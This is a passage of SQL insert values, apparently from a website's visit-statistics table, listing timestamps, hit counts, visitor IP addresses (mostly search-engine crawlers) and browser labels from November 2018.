ther'),(335095,1542491989,2,2,0,0,'66.249.66.152','chrome'),(335096,1542492003,2,2,0,0,'66.249.66.44','chrome'),(335097,1542492023,1,1,0,0,'5.45.207.79','other'),(335098,1542492073,1,1,0,0,'46.229.168.138','other'),(335099,1542492077,1,1,0,0,'46.229.168.152','other'),(335100,1542492231,2,2,0,0,'178.154.244.11','other'),(335101,1542492277,1,1,0,0,'141.8.142.103','other'),(335102,1542492538,1,0,1,0,'66.249.66.42',''),(335103,1542492595,1,1,0,0,'54.36.149.93','other'),(335104,1542493009,1,1,0,0,'54.36.148.215','other'),(335105,1542493039,5,5,0,0,'66.249.66.44','chrome'),(335106,1542493167,2,2,0,0,'66.249.66.57','chrome'),(335107,1542493217,1,1,0,0,'54.36.148.133','other'),(335108,1542493248,1,1,0,0,'66.249.66.61','chrome'),(335109,1542493471,1,1,0,0,'54.36.148.44','other'),(335110,1542493536,8,8,0,0,'66.249.66.40','chrome'),(335111,1542493652,8,8,0,0,'216.244.66.241','other'),(335112,1542493661,4,4,0,0,'66.249.66.42','chrome'),(335113,1542493792,1,1,0,0,'54.36.148.119','other'),(335114,1542493868,1,1,0,0,'54.36.148.41','other'),(335115,1542493928,1,1,0,0,'46.229.168.129','other'),(335116,1542494074,2,2,0,0,'66.249.66.44','chrome'),(335117,1542494175,1,1,0,0,'91.222.155.180','firefox'),(335118,1542494557,1,1,0,0,'8.29.198.26','other'),(335119,1542494579,1,1,0,0,'54.36.149.35','other'),(335120,1542494599,1,1,0,0,'37.221.142.194','firefox'),(335121,1542494616,1,1,0,0,'207.46.13.169','other'),(335122,1542494886,1,1,0,0,'5.58.105.201','firefox'),(335123,1542494966,1,1,0,0,'46.229.168.147','other'),(335124,1542495019,1,1,0,0,'54.36.148.228','other'),(335125,1542495037,1,1,0,0,'54.36.148.13','other'),(335126,1542495228,1,1,0,0,'54.36.148.244','other'),(335127,1542495702,1,1,0,0,'46.229.168.152','other'),(335128,1542495706,1,1,0,0,'46.229.168.129','other'),(335129,1542495786,1,1,0,0,'54.36.149.61','other'),(335130,1542495971,1,1,0,0,'54.36.148.251','other'),(335131,1542496088,1,1,0,0,'8.29.198.25','other'),(335132,1542496260,1,1,0,0,'66.249.66.156','chrome'),(335133,1542496267,2,2,0,0,'216.244.66.241','other'),(335134,1542496368,1,1,0,0,'54.36.148.23','other'),(335135,1542496400,1,1,0,0,'54.36.148.53','other'),(335136,1542496409,1,1,0,0,'54.36.148.212','other'),(335137,1542496482,1,1,0,0,'54.36.149.52','other'),(335138,1542496508,1,1,0,0,'207.46.13.172','other'),(335139,1542496559,1,1,0,0,'95.163.255.115','other'),(335140,1542496564,1,1,0,0,'95.163.255.108','other'),(335141,1542496584,1,1,0,0,'66.249.66.42','chrome'),(335142,1542496638,1,1,0,0,'8.29.198.26','other'),(335143,1542496680,1,1,0,0,'54.36.148.187','other'),(335144,1542496876,1,1,0,0,'54.36.148.164','other'),(335145,1542496917,1,1,0,0,'46.229.168.142','other'),(335146,1542496971,1,1,0,0,'54.36.148.122','other'),(335147,1542497017,1,1,0,0,'91.214.85.248','firefox'),(335148,1542497020,1,1,0,0,'157.55.39.212','other'),(335149,1542497209,1,1,0,0,'54.36.149.23','other'),(335150,1542497541,1,1,0,0,'66.249.66.40','chrome'),(335151,1542497624,1,1,0,0,'54.36.148.88','other'),(335152,1542497670,1,1,0,0,'54.36.149.18','other'),(335153,1542497852,1,1,0,0,'207.46.13.169','other'),(335154,1542498059,1,1,0,0,'54.36.149.80','other'),(335155,1542498234,1,1,0,0,'54.36.148.71','other'),(335156,1542498580,1,1,0,0,'54.36.148.49','other'),(335157,1542498748,1,1,0,0,'54.36.148.217','other'),(335158,1542498915,1,1,0,0,'107.155.49.114','other'),(335159,1542498917,1,1,0,0,'185.100.86.154','other'),(335160,1542499049,1,1,0,0,'54.36.148.72','other'),(335161,1542499177,1,1,0,0,'66.249.66.59','chrome'),(335162,1542499178,2,2,0,0,'66.249.66.44','chrome'),(335163,1542499191,1,1,0,0,'207.46.13.169','other'),(335164,1542499362,4,4,0,0,'216.244.66.241','other'),(335165,1542499481,14,14,0,0,'69.30.226.234','other'),(335166,1542499570,1,1,0,0,'54.36.149.42','other'),(335167,1542499855,1,1,0,0,'66.249.66.57','chrome'),(335168,1542499884,1,1,0,0,'54.36.149.93','other'),(335169,1542499927,1,1,0,0,'157.55.39.212','other'),(335170,1542499948,1,1,0,0,'66.249.66.40','chrome'),(335171,1542500842,1,1,0,0,'66.249.66.59','chrome'),(335172,1542500843,1,1,0,0,'66.249.66.44','chrome'),(335173,1542500913,1,1,0,0,'54.36.149.33','other'),(335174,1542501380,1,1,0,0,'66.249.66.40','chrome'),(335175,1542501491,1,1,0,0,'54.36.148.206','other'),(335176,1542501573,1,1,0,0,'54.36.149.4','other'),(335177,1542502083,1,1,0,0,'54.36.149.5','other'),(335178,1542502141,1,1,0,0,'54.36.148.107','other'),(335179,1542502235,2,2,0,0,'178.154.244.29','other'),(335180,1542502373,3,3,0,0,'216.244.66.241','other'),(335181,1542502513,1,1,0,0,'54.36.148.129','other'),(335182,1542502524,1,1,0,0,'207.46.13.172','other'),(335183,1542502566,1,1,0,0,'66.249.66.40','chrome'),(335184,1542502781,1,1,0,0,'54.36.148.160','other'),(335185,1542503134,1,1,0,0,'66.249.66.156','chrome'),(335186,1542503644,1,1,0,0,'54.36.148.172','other'),(335187,1542503723,1,1,0,0,'157.55.39.212','other'),(335188,1542503751,1,1,0,0,'66.249.66.157','chrome'),(335189,1542503752,1,1,0,0,'66.249.66.152','chrome'),(335190,1542504113,1,1,0,0,'54.36.148.60','other'),(335191,1542504245,4,4,0,0,'216.244.66.241','other'),(335192,1542504613,1,1,0,0,'54.36.149.46','other'),(335193,1542504764,1,1,0,0,'46.229.168.153','other'),(335194,1542504770,1,1,0,0,'46.229.168.145','other'),(335195,1542504827,1,1,0,0,'54.36.149.90','other'),(335196,1542504901,1,1,0,0,'54.36.149.69','other'),(335197,1542505015,1,1,0,0,'54.36.149.22','other'),(335198,1542505386,1,1,0,0,'8.29.198.25','other'),(335199,1542505660,1,1,0,0,'54.36.148.28','other'),(335200,1542505666,1,1,0,0,'54.36.148.127','other'),(335201,1542505824,1,1,0,0,'66.249.66.156','chrome'),(335202,1542506102,1,1,0,0,'207.46.13.207','other'),(335203,1542506131,1,1,0,0,'54.36.148.53','other'),(335204,1542506144,1,1,0,0,'54.36.148.32','other'),(335205,1542506174,1,1,0,0,'54.36.148.219','other'),(335206,1542506234,1,1,0,0,'95.163.255.99','other'),(335207,1542506236,1,1,0,0,'95.163.255.97','other'),(335208,1542506600,1,1,0,0,'54.36.148.110','other'),(335209,1542506648,1,1,0,0,'54.36.149.55','other'),(335210,1542506656,1,1,0,0,'54.36.149.18','other'),(335211,1542506897,1,1,0,0,'54.36.148.131','other'),(335212,1542506923,1,1,0,0,'8.29.198.26','other'),(335213,1542506993,1,1,0,0,'157.55.39.212','other'),(335214,1542507132,1,1,0,0,'54.36.148.56','other'),(335215,1542507301,5,5,0,0,'216.244.66.241','other'),(335216,1542507481,1,1,0,0,'8.29.198.25','other'),(335217,1542507486,1,1,0,0,'54.36.148.200','other'),(335218,1542507550,2,2,0,0,'91.209.11.236','other'),(335219,1542507763,1,1,0,0,'46.229.168.152','other'),(335220,1542507766,2,2,0,0,'46.229.168.142','other'),(335221,1542507774,1,1,0,0,'54.36.148.152','other'),(335222,1542507795,1,1,0,0,'46.229.168.137','other'),(335223,1542507977,1,1,0,0,'194.44.253.140','chrome'),(335224,1542508003,1,1,0,0,'66.249.66.152','chrome'),(335225,1542508344,1,1,0,0,'54.36.149.41','other'),(335226,1542508377,1,1,0,0,'54.36.148.48','other'),(335227,1542508411,1,1,0,0,'66.249.66.156','chrome'),(335228,1542508616,1,1,0,0,'46.229.168.140','other'),(335229,1542508903,1,1,0,0,'194.44.253.140','chrome'),(335230,1542509301,1,1,0,0,'54.36.148.143','other'),(335231,1542509639,1,1,0,0,'54.36.148.13','other'),(335232,1542509653,4,4,0,0,'216.244.66.241','other'),(335233,1542510064,1,1,0,0,'46.229.168.149','other'),(335234,1542510067,1,1,0,0,'46.229.168.134','other'),(335235,1542510077,1,1,0,0,'54.36.148.33','other'),(335236,1542510388,1,1,0,0,'54.36.148.114','other'),(335237,1542510729,1,1,0,0,'54.36.148.127','other'),(335238,1542510818,1,1,0,0,'54.36.148.115','other'),(335239,1542510871,1,1,0,0,'207.46.13.207','other'),(335240,1542510999,1,1,0,0,'216.244.66.241','other'),(335241,1542511075,1,1,0,0,'54.36.148.30','other'),(335242,1542511382,1,1,0,0,'46.229.168.144','other'),(335243,1542511385,1,1,0,0,'46.229.168.139','other'),(335244,1542511418,1,1,0,0,'54.36.149.67','other'),(335245,1542511490,1,1,0,0,'54.36.148.153','other'),(335246,1542511626,1,1,0,0,'54.36.148.129','other'),(335247,1542511649,1,1,0,0,'54.36.148.122','other'),(335248,1542511681,1,1,0,0,'46.229.168.137','other'),(335249,1542511683,1,1,0,0,'46.229.168.134','other'),(335250,1542511747,1,1,0,0,'46.229.168.130','other'),(335251,1542511820,2,2,0,0,'66.249.66.152','chrome'),(335252,1542511898,1,1,0,0,'54.36.149.69','other'),(335253,1542512036,17,17,0,0,'178.154.244.29','other'),(335254,1542512096,2,2,0,0,'5.45.207.79','other'),(335255,1542512190,2,2,0,0,'66.249.66.156','chrome'),(335256,1542512222,3,3,0,0,'216.244.66.241','other'),(335257,1542512252,17,17,0,0,'178.154.244.11','other'),(335258,1542512353,2,2,0,0,'34.211.225.16','chrome'),(335259,1542512452,1,1,0,0,'87.250.224.65','other'),(335260,1542512692,1,1,0,0,'46.229.168.136','other'),(335261,1542512694,1,1,0,0,'46.229.168.133','other'),(335262,1542512739,1,1,0,0,'141.8.142.103','other'),(335263,1542512942,13,13,0,0,'178.154.244.29','other'),(335264,1542512953,1,1,0,0,'66.249.66.154','chrome'),(335265,1542512976,1,1,0,0,'54.36.148.26','other'),(335266,1542513180,5,5,0,0,'5.45.207.79','other'),(335267,1542513267,1,1,0,0,'13.66.139.0','other'),(335268,1542513349,1,1,0,0,'5.45.207.19','other'),(335269,1542513427,1,1,0,0,'95.108.213.4','other'),(335270,1542513468,1,1,0,0,'34.208.82.171','firefox'),(335271,1542513544,1,1,0,0,'54.36.149.47','other'),(335272,1542513666,22,22,0,0,'46.4.67.206','other'),(335273,1542513747,1,1,0,0,'54.36.148.147','other'),(335274,1542513885,10,10,0,0,'178.154.244.29','other'),(335275,1542513916,13,13,0,0,'178.154.244.11','other'),(335276,1542513928,1,1,0,0,'54.36.148.123','other'),(335277,1542513977,1,1,0,0,'54.36.148.105','other'),(335278,1542514031,1,1,0,0,'141.8.142.103','other'),(335279,1542514189,1,1,0,0,'54.36.148.95','other'),(335280,1542514360,1,1,0,0,'54.36.149.21','other'),(335281,1542514396,1,1,0,0,'54.36.148.213','other'),(335282,1542514413,3,3,0,0,'216.244.66.241','other'),(335283,1542514455,1,1,0,0,'5.45.207.19','other'),(335284,1542514577,1,1,0,0,'95.108.213.4','other'),(335285,1542514832,3,3,0,0,'178.154.244.29','other'),(335286,1542515694,1,1,0,0,'54.36.148.251','other'),(335287,1542515741,1,1,0,0,'66.249.66.42','chrome'),(335288,1542515790,4,4,0,0,'207.46.13.138','other'),(335289,1542515956,4,4,0,0,'207.46.13.172','other'),(335290,1542515965,3,3,0,0,'207.46.13.207','other'),(335291,1542515970,2,2,0,0,'157.55.39.212','other'),(335292,1542516050,1,1,0,0,'54.36.149.50','other'),(335293,1542516086,1,1,0,0,'54.36.148.176','other'),(335294,1542516207,2,2,0,0,'46.242.14.74','chrome'),(335295,1542516227,1,1,0,0,'8.29.198.26','other'),(335296,1542516261,1,1,0,0,'178.154.244.11','other'),(335297,1542516331,1,1,0,0,'178.154.244.29','other'),(335298,1542516530,1,1,0,0,'216.244.66.241','other'),(335299,1542517016,1,1,0,0,'54.36.148.52','other'),(335300,1542517070,1,1,0,0,'207.46.13.138','other'),(335301,1542517226,1,1,0,0,'54.36.149.68','other'),(335302,1542517343,1,1,0,0,'46.229.168.142','other'),(335303,1542517534,5,5,0,0,'216.244.66.241','other'),(335304,1542517729,1,1,0,0,'46.229.168.133','other'),(335305,1542517731,1,1,0,0,'46.229.168.138','other'),(335306,1542517739,1,1,0,0,'46.229.168.141','other'),(335307,1542517760,2,2,0,0,'8.29.198.26','other'),(335308,1542517913,1,1,0,0,'54.36.148.124','other'),(335309,1542517972,1,1,0,0,'54.36.148.112','other'),(335310,1542518951,2,2,0,0,'66.249.66.154','chrome'),(335311,1542519085,1,1,0,0,'54.36.148.11','other'),(335312,1542519402,1,1,0,0,'207.46.13.138','other'),(335313,1542519579,5,5,0,0,'216.244.66.241','other'),(335314,1542519652,1,1,0,0,'54.36.148.206','other'),(335315,1542519687,1,1,0,0,'54.36.149.77','other'),(335316,1542519956,1,1,0,0,'66.249.66.154','chrome'),(335317,1542519975,1,1,0,0,'54.36.148.92','other'),(335318,1542520125,1,1,0,0,'95.163.255.93','other'),(335319,1542520128,1,1,0,0,'95.163.255.99','other'),(335320,1542520132,1,1,0,0,'54.36.149.34','other'),(335321,1542520362,1,0,1,0,'66.249.66.42',''),(335322,1542520749,2,2,0,0,'216.244.66.241','other'),(335323,1542520800,2,2,0,0,'207.46.13.172','other'),(335324,1542520861,1,1,0,0,'54.36.148.220','other'),(335325,1542520877,1,1,0,0,'54.36.149.74','other'),(335326,1542520884,1,1,0,0,'54.36.149.91','other'),(335327,1542520995,1,1,0,0,'66.249.66.157','chrome'),(335328,1542520996,1,1,0,0,'66.249.66.152','chrome'),(335329,1542521178,1,0,1,0,'66.249.66.154',''),(335330,1542521535,2,2,0,0,'207.46.13.207','other'),(335331,1542521563,3,3,0,0,'195.128.17.206','other'),(335332,1542522042,1,1,0,0,'54.36.148.122','other'),(335333,1542522061,1,1,0,0,'54.36.148.224','other'),(335334,1542522378,1,1,0,0,'54.36.148.38','other'),(335335,1542522644,1,1,0,0,'54.36.149.22','other'),(335336,1542522741,4,4,0,0,'216.244.66.241','other'),(335337,1542522755,1,1,0,0,'54.36.149.45','other'),(335338,1542522959,1,1,0,0,'54.36.148.137','other'),(335339,1542523180,1,1,0,0,'207.46.13.207','other'),(335340,1542523362,1,1,0,0,'157.55.39.212','other'),(335341,1542523473,1,1,0,0,'54.36.148.29','other'),(335342,1542523494,1,1,0,0,'66.249.66.42','chrome'),(335343,1542523812,1,1,0,0,'66.249.66.157','chrome'),(335344,1542523813,1,1,0,0,'66.249.66.154','chrome'),(335345,1542523870,1,1,0,0,'54.36.148.45','other'),(335346,1542523877,2,2,0,0,'46.229.168.147','other'),(335347,1542523977,1,1,0,0,'54.36.149.105','other'),(335348,1542524326,1,1,0,0,'54.36.148.34','other'),(335349,1542524417,1,0,1,0,'66.249.66.44',''),(335350,1542524524,1,1,0,0,'46.229.168.152','other'),(335351,1542524594,1,1,0,0,'54.36.148.102','other'),(335352,1542524688,1,1,0,0,'54.36.148.90','other'),(335353,1542524747,1,1,0,0,'54.36.148.179','other'),(335354,1542524753,1,1,0,0,'54.36.148.61','other'),(335355,1542524792,1,1,0,0,'54.36.149.32','other'),(335356,1542524801,1,1,0,0,'157.55.39.212','other'),(335357,1542524912,1,1,0,0,'54.36.148.254','other'),(335358,1542524927,1,1,0,0,'54.36.149.82','other'),(335359,1542525031,1,1,0,0,'54.36.148.152','other'),(335360,1542525040,1,1,0,0,'54.36.149.28','other'),(335361,1542525112,10,10,0,0,'216.244.66.241','other'),(335362,1542525171,1,1,0,0,'66.249.66.152','chrome'),(335363,1542525256,1,1,0,0,'54.36.148.60','other'),(335364,1542525415,1,1,0,0,'54.36.148.35','other'),(335365,1542525420,1,1,0,0,'54.36.148.167','other'),(335366,1542525751,2,2,0,0,'46.211.108.205','chrome'),(335367,1542526002,1,1,0,0,'54.36.149.81','other'),(335368,1542526268,1,1,0,0,'54.36.148.67','other'),(335369,1542526475,1,1,0,0,'141.8.142.38','other'),(335370,1542526521,1,1,0,0,'66.249.69.219','chrome'),(335371,1542526522,1,1,0,0,'66.249.66.40','chrome'),(335372,1542526560,1,1,0,0,'54.36.149.91','other'),(335373,1542526619,1,1,0,0,'54.36.148.200','other'),(335374,1542526680,2,2,0,0,'66.249.66.154','chrome'),(335375,1542527034,1,1,0,0,'54.36.148.44','other'),(335376,1542527056,1,1,0,0,'8.29.198.26','other'),(335377,1542527123,2,2,0,0,'66.249.66.156','chrome'),(335378,1542527158,1,1,0,0,'66.249.66.44','chrome'),(335379,1542527220,1,1,0,0,'66.249.66.155','chrome'),(335380,1542527238,1,1,0,0,'66.249.66.152','chrome'),(335381,1542527263,1,1,0,0,'54.36.149.47','other'),(335382,1542527318,1,1,0,0,'54.36.148.139','other'),(335383,1542527401,1,1,0,0,'54.36.148.194','other'),(335384,1542527415,1,1,0,0,'54.36.148.226','other'),(335385,1542527444,76,76,0,0,'54.92.193.89','other'),(335386,1542527516,1,1,0,0,'54.36.149.2','other'),(335387,1542527590,4,4,0,0,'66.249.66.154','chrome'),(335388,1542527729,5,5,0,0,'216.244.66.241','other'),(335389,1542527776,1,1,0,0,'54.36.148.150','other'),(335390,1542527899,2,2,0,0,'207.46.13.172','other'),(335391,1542527902,2,2,0,0,'157.55.39.212','other'),(335392,1542528084,1,1,0,0,'54.36.148.177','other'),(335393,1542528141,1,1,0,0,'54.36.148.145','other'),(335394,1542528145,1,1,0,0,'66.249.66.157','chrome'),(335395,1542528341,1,1,0,0,'207.46.13.138','other'),(335396,1542528400,30,30,0,0,'54.92.193.89','other'),(335397,1542528521,1,0,1,0,'66.249.66.40',''),(335398,1542528586,2,2,0,0,'95.163.255.66','other'),(335399,1542528593,1,1,0,0,'8.29.198.26','other'),(335400,1542529000,1,1,0,0,'54.36.149.72','other'),(335401,1542529149,1,1,0,0,'8.29.198.25','other'),(335402,1542529310,26,26,0,0,'54.92.193.89','other'),(335403,1542529528,1,1,0,0,'54.36.148.112','other'),(335404,1542529644,1,1,0,0,'54.36.149.86','other'),(335405,1542529759,1,1,0,0,'54.36.149.85','other'),(335406,1542530172,1,1,0,0,'54.36.148.159','other'),(335407,1542530179,1,1,0,0,'54.36.148.101','other'),(335408,1542530181,1,1,0,0,'54.36.148.229','other'),(335409,1542530247,22,22,0,0,'54.92.193.89','other'),(335410,1542530268,1,1,0,0,'54.36.148.125','other'),(335411,1542530331,3,3,0,0,'216.244.66.241','other'),(335412,1542530869,1,1,0,0,'54.36.149.13','other'),(335413,1542531155,1,1,0,0,'54.36.148.235','other'),(335414,1542531156,18,18,0,0,'54.92.193.89','other'),(335415,1542531164,1,1,0,0,'54.36.148.143','other'),(335416,1542531267,2,2,0,0,'66.249.66.154','chrome'),(335417,1542531688,1,1,0,0,'54.36.149.85','other'),(335418,1542531775,1,1,0,0,'54.36.148.163','other'),(335419,1542531838,3,3,0,0,'66.249.66.152','chrome'),(335420,1542532068,20,20,0,0,'54.92.193.89','other'),(335421,1542532283,1,1,0,0,'54.36.149.49','other'),(335422,1542532303,2,2,0,0,'66.249.66.156','chrome'),(335423,1542532778,5,5,0,0,'216.244.66.241','other'),(335424,1542533096,1,1,0,0,'54.36.149.85','other'),(335425,1542533371,1,1,0,0,'95.163.255.118','other'),(335426,1542533373,1,1,0,0,'95.163.255.107','other'),(335427,1542533388,1,1,0,0,'66.249.66.152','chrome'),(335428,1542533421,1,1,0,0,'54.36.148.127','other'),(335429,1542533435,1,1,0,0,'157.55.39.168','other'),(335430,1542533548,1,1,0,0,'66.249.66.44','chrome'),(335431,1542533671,1,1,0,0,'54.36.148.122','other'),(335432,1542533848,1,1,0,0,'54.36.148.77','other'),(335433,1542533988,1,1,0,0,'54.36.149.18','other'),(335434,1542534016,1,1,0,0,'54.36.148.44','other'),(335435,1542534251,1,1,0,0,'54.36.148.115','other'),(335436,1542534431,1,1,0,0,'54.36.149.55','other'),(335437,1542534846,1,1,0,0,'54.36.149.52','other'),(335438,1542534877,1,1,0,0,'216.244.66.241','other'),(335439,1542535014,1,1,0,0,'207.46.13.172','other'),(335440,1542535401,1,1,0,0,'54.36.149.13','other'),(335441,1542535520,2,2,0,0,'5.58.56.139','chrome'),(335442,1542535527,1,1,0,0,'54.36.148.230','other'),(335443,1542535781,1,1,0,0,'54.36.149.2','other'),(335444,1542535806,3,3,0,0,'216.244.66.241','other'),(335445,1542536038,1,1,0,0,'54.36.148.142','other'),(335446,1542536181,1,1,0,0,'54.36.148.102','other'),(335447,1542536464,1,1,0,0,'54.36.148.150','other'),(335448,1542536929,1,1,0,0,'54.36.148.54','other'),(335449,1542537212,1,1,0,0,'213.180.203.53','other'),(335450,1542537216,4,4,0,0,'213.180.203.23','other'),(335451,1542537222,1,1,0,0,'54.36.148.76','other'),(335452,1542537258,1,1,0,0,'54.36.148.43','other'),(335453,1542537283,3,3,0,0,'141.8.142.65','other'),(335454,1542537289,2,2,0,0,'178.154.200.8','other'),(335455,1542537292,3,3,0,0,'5.45.207.76','other'),(335456,1542537295,1,1,0,0,'5.255.253.22','other'),(335457,1542537298,1,1,0,0,'141.8.142.144','other'),(335458,1542537300,2,2,0,0,'87.250.224.47','other'),(335459,1542537438,1,1,0,0,'46.229.168.148','other'),(335460,1542537442,2,2,0,0,'46.229.168.151','other'),(335462,1542537450,1,1,0,0,'37.9.113.38','other'),(335463,1542537454,2,2,0,0,'5.45.207.79','other'),(335464,1542537456,2,2,0,0,'5.45.207.19','other'),(335465,1542537458,1,1,0,0,'46.229.168.135','other'),(335466,1542537467,3,3,0,0,'87.250.224.65','other'),(335467,1542537469,1,1,0,0,'178.154.244.49','other'),(335468,1542537471,1,1,0,0,'141.8.183.23','other'),(335469,1542537520,1,1,0,0,'54.36.149.33','other'),(335470,1542537543,1,1,0,0,'54.36.148.93','other'),(335471,1542537561,4,4,0,0,'213.180.203.40','other'),(335472,1542537614,1,1,0,0,'141.8.142.38','other'),(335473,1542537658,3,3,0,0,'141.8.142.162','other'),(335474,1542537661,1,1,0,0,'54.36.148.87','other'),(335475,1542537698,3,3,0,0,'87.250.224.99','other'),(335476,1542537730,1,1,0,0,'93.158.166.7','other'),(335477,1542537739,4,4,0,0,'37.9.113.148','other'),(335478,1542537845,1,1,0,0,'95.108.181.94','other'),(335479,1542537889,1,1,0,0,'8.29.198.27','other'),(335480,1542537901,1,1,0,0,'141.8.183.22','other'),(335481,1542538201,1,1,0,0,'178.154.171.69','other'),(335482,1542538292,1,1,0,0,'54.36.148.103','other'),(335483,1542538308,2,2,0,0,'87.250.224.47','other'),(335484,1542538388,2,2,0,0,'5.255.253.16','other'),(335485,1542538400,1,1,0,0,'5.45.207.19','other'),(335486,1542538402,2,2,0,0,'37.9.113.103','other'),(335487,1542538443,2,2,0,0,'66.249.66.156','chrome'),(335488,1542538461,1,1,0,0,'213.180.203.17','other'),(335489,1542538509,1,1,0,0,'95.108.213.4','other'),(335490,1542538550,1,1,0,0,'54.36.148.52','other'),(335491,1542538552,5,5,0,0,'178.154.200.8','other'),(335492,1542538591,4,4,0,0,'141.8.142.103','other'),(335493,1542538631,2,2,0,0,'216.244.66.241','other'),(335494,1542538711,1,1,0,0,'54.36.148.233','other'),(335495,1542538808,2,2,0,0,'213.180.203.48','other'),(335496,1542538809,3,3,0,0,'5.45.207.79','other'),(335497,1542538821,1,1,0,0,'141.8.183.22','other'),(335498,1542538873,1,1,0,0,'178.154.244.11','other'),(335499,1542538913,3,3,0,0,'87.250.224.65','other'),(335500,1542538928,1,1,0,0,'178.154.171.30','other'),(335501,1542538954,1,1,0,0,'54.36.148.158','other'),(335502,1542538988,1,1,0,0,'213.180.203.53','other'),(335503,1542539046,2,2,0,0,'157.55.39.212','other'),(335504,1542539150,1,1,0,0,'213.180.203.40','other'),(335505,1542539160,1,1,0,0,'157.55.39.168','other'),(335506,1542539178,1,1,0,0,'5.255.253.22','other'),(335507,1542539293,1,1,0,0,'54.36.148.247','other'),(335508,1542539294,1,1,0,0,'46.229.168.138','other'),(335509,1542539297,1,1,0,0,'46.229.168.133','other'),(335510,1542539304,1,1,0,0,'95.46.141.83','firefox'),(335511,1542539381,1,1,0,0,'5.255.253.16','other'),(335512,1542539392,1,1,0,0,'66.249.66.157','chrome'),(335514,1542539403,1,1,0,0,'66.249.66.155','chrome'),(335515,1542539405,1,1,0,0,'66.249.66.154','chrome'),(335516,1542539407,2,2,0,0,'95.108.213.50','other'),(335517,1542539426,1,1,0,0,'8.29.198.27','other'),(335518,1542539544,1,1,0,0,'54.36.149.31','other'),(335519,1542539581,1,1,0,0,'5.255.253.25','other'),(335520,1542539590,2,2,0,0,'5.45.207.76','other'),(335521,1542539594,1,1,0,0,'141.8.142.108','other'),(335522,1542539595,1,1,0,0,'178.154.171.69','other'),(335523,1542539604,2,2,0,0,'95.108.181.94','other'),(335524,1542539750,2,2,0,0,'37.9.113.103','other'),(335525,1542539752,2,2,0,0,'141.8.142.38','other'),(335526,1542539791,1,1,0,0,'46.229.168.144','other'),(335527,1542539877,2,2,0,0,'37.9.113.148','other'),(335528,1542539878,1,1,0,0,'95.108.181.83','other'),(335529,1542539892,1,1,0,0,'141.8.142.162','other'),(335530,1542539911,1,1,0,0,'141.8.183.11','other'),(335531,1542539971,2,2,0,0,'141.8.142.65','other'),(335532,1542539994,1,1,0,0,'8.29.198.26','other'),(335533,1542540113,1,1,0,0,'5.45.207.79','other'),(335534,1542540149,1,1,0,0,'213.180.203.53','other'),(335535,1542540268,3,3,0,0,'141.8.142.103','other'),(335536,1542540295,1,1,0,0,'54.36.149.62','other'),(335537,1542540356,1,1,0,0,'213.180.203.23','other'),(335538,1542540359,1,1,0,0,'178.154.171.30','other'),(335539,1542540452,1,1,0,0,'95.108.213.50','other'),(335540,1542540539,1,1,0,0,'66.249.66.152','chrome'),(335541,1542540543,1,1,0,0,'54.36.148.164','other'),(335542,1542540624,2,2,0,0,'66.249.66.156','chrome'),(335543,1542540775,2,2,0,0,'178.154.244.11','other'),(335544,1542540777,2,2,0,0,'5.45.207.19','other'),(335545,1542540862,2,2,0,0,'216.244.66.241','other'),(335546,1542540944,1,1,0,0,'54.36.148.90','other'),(335547,1542541075,2,2,0,0,'5.255.253.16','other'),(335548,1542541077,1,1,0,0,'141.8.142.191','other'),(335549,1542541079,1,1,0,0,'95.108.181.94','other'),(335550,1542541183,1,1,0,0,'178.154.171.69','other'),(335551,1542541209,1,1,0,0,'54.36.148.20','other'),(335552,1542541222,1,1,0,0,'37.9.113.148','other'),(335553,1542541224,1,1,0,0,'213.180.203.17','other'),(335554,1542541322,1,1,0,0,'54.36.149.96','other'),(335555,1542541349,1,1,0,0,'54.36.148.98','other'),(335556,1542541402,1,1,0,0,'37.9.113.103','other'),(335557,1542541561,1,1,0,0,'54.36.148.24','other'),(335558,1542541564,1,1,0,0,'37.9.113.38','other'),(335559,1542541579,1,1,0,0,'54.36.148.107','other'),(335560,1542541601,1,1,0,0,'178.154.171.30','other'),(335561,1542541705,1,1,0,0,'54.36.148.16','other'),(335562,1542541713,1,1,0,0,'54.36.148.81','other'),(335563,1542541814,2,2,0,0,'5.45.207.79','other'),(335564,1542541984,3,3,0,0,'207.46.13.138','other'),(335565,1542542061,1,1,0,0,'54.36.148.234','other'),(335566,1542542101,1,1,0,0,'54.36.148.150','other'),(335567,1542542187,1,1,0,0,'95.108.181.94','other'),(335568,1542542211,1,1,0,0,'87.250.224.47','other'),(335569,1542542254,1,1,0,0,'66.249.66.40','chrome'),(335570,1542542450,1,1,0,0,'216.244.66.241','other'),(335571,1542542840,2,2,0,0,'91.209.11.236','other'),(335572,1542542865,1,1,0,0,'5.248.182.152','chrome'),(335573,1542543147,1,1,0,0,'46.229.168.151','other'),(335574,1542543149,1,1,0,0,'46.229.168.137','other'),(335575,1542543340,1,1,0,0,'34.239.1.0','other'),(335576,1542543511,1,1,0,0,'54.36.149.78','other'),(335577,1542543517,4,4,0,0,'216.244.66.241','other'),(335578,1542543725,2,2,0,0,'66.249.66.155','chrome'),(335580,1542543762,2,2,0,0,'54.36.149.58','other'),(335581,1542543879,1,1,0,0,'66.249.66.152','chrome'),(335582,1542543919,1,1,0,0,'66.249.66.40','chrome'),(335583,1542544164,2,2,0,0,'109.173.40.29','chrome'),(335584,1542544166,2,2,0,0,'188.32.166.153','chrome'),(335585,1542544169,1,1,0,0,'95.163.255.93','other'),(335586,1542544172,1,1,0,0,'95.163.255.94','other'),(335587,1542544407,1,1,0,0,'54.36.148.154','other'),(335588,1542544434,1,1,0,0,'54.36.149.28','other'),(335589,1542544443,1,1,0,0,'46.229.168.139','other'),(335590,1542544447,1,1,0,0,'46.229.168.149','other'),(335591,1542544785,1,1,0,0,'157.55.39.212','other'),(335592,1542544834,1,1,0,0,'178.154.244.29','other'),(335593,1542544901,1,1,0,0,'54.36.148.158','other'),(335594,1542544973,1,1,0,0,'54.36.148.41','other'),(335595,1542545260,1,1,0,0,'207.46.13.138','other'),(335596,1542545386,2,2,0,0,'216.244.66.241','other'),(335597,1542545668,1,1,0,0,'66.249.66.154','chrome'),(335598,1542545827,1,1,0,0,'54.36.149.83','other'),(335599,1542546081,1,1,0,0,'46.229.168.133','other'),(335600,1542546326,1,1,0,0,'54.36.148.49','other'),(335601,1542546328,1,1,0,0,'216.244.66.241','other'),(335602,1542546420,1,1,0,0,'46.229.168.146','other'),(335603,1542546426,1,1,0,0,'66.249.66.152','chrome'),(335604,1542546461,1,1,0,0,'54.36.149.61','other'),(335605,1542547083,1,1,0,0,'109.162.115.161','firefox'),(335606,1542547179,1,1,0,0,'54.36.148.109','other'),(335607,1542547280,1,1,0,0,'66.249.66.156','chrome'),(335608,1542547548,1,1,0,0,'54.36.149.40','other'),(335609,1542547612,1,1,0,0,'54.36.